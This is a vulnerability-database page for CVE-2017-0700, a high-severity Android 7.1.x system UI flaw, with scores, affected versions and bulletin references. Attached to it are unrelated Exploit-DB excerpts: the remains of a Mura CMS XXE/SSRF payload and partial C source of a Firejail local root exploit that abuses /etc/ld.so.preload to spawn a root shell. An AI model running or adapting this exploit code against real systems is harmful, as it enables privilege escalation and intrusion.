CVE-2017-0700
published 2017-07-06CVE-2017-0700: A remote code execution vulnerability in the Android system ui. Product: Android. Versions: 7.1.1, 7.1.2. Android ID: A-35639138.
PriorityP338high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EPSS
1.38%
69.0th percentile
A remote code execution vulnerability in the Android system ui. Product: Android. Versions: 7.1.1, 7.1.2. Android ID: A-35639138.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android | — | — | |
| android | — | — | |
| android | — | — | |
| google_inc | android | — | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6hm2-c6p5-fc7q: A remote code execution vulnerability in the Android system ui
ghsa_unreviewed·2022-05-13
CVE-2017-0700 [HIGH] GHSA-6hm2-c6p5-fc7q: A remote code execution vulnerability in the Android system ui
A remote code execution vulnerability in the Android system ui. Product: Android. Versions: 7.1.1, 7.1.2. Android ID: A-35639138.
Android
CVE-2017-0700: Android Security Bulletin 2017-07-01
CVE: CVE-2017-0700
Severity: HIGH
Type: RCE
Affected AOSP versions: 7
vendor_android·2017-07-01·CVSS 7.8
CVE-2017-0700 [HIGH] CVE-2017-0700: Android Security Bulletin 2017-07-01
CVE: CVE-2017-0700
Severity: HIGH
Type: RCE
Affected AOSP versions: 7
Android Security Bulletin 2017-07-01
CVE: CVE-2017-0700
Severity: HIGH
Type: RCE
Affected AOSP versions: 7.1.1, 7.1.2
References: A-35639138
No detection rules found.
Exploit-DB
Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection
exploitdb·2017-10-24·CVSS 6.5
CVE-2017-15639 [MEDIUM] Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection
Mura CMS
]>
title
link
description
http://www.getmura.com
Thu, 28 Sep 2018 11:55:19 -0700
en-us
Item title
http://host/
00000000-0000-0000-0000000000000000
Thu, 21 Sep 2018 00:00:01 -0700
&send;
3. Solution:
delete readRSS.cfm from the server.
Exploit-DB
Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape
exploitdb·2017-01-04
CVE-2017-5180 Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape
Firejail
#include
#include
#include
#include
#include
#include
#include
const char *const ldso = "/etc/ld.so.preload";
int main();
__attribute__((constructor)) void init(void)
{
if (geteuid())
return;
unlink(ldso);
char *sh[] = {"/bin/sh", "--noprofile", "--norc", NULL};
setuid(0);
setgid(0);
execve(*sh, sh, NULL);
exit(1);
}
void die(const char *s)
{
perror(s);
exit(errno);
}
int main()
{
printf("[*] fire(j|n)ail local root exploit 2017\n\n");
char me[4096] = {0}, *home = getenv("HOME");
if (!home)
die("[-] no $HOME");
if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
die("[-] Unable to find myself");
char path[256] = {0};
snprintf(path, sizeof(path) - 1, "%s/.firenail", home);
if (mkdir(path, 0700) < 0 && errno != EEXIST)
die("[-] mkdir");
snprintf(path, sizeof(path) -
2017-07-06
Published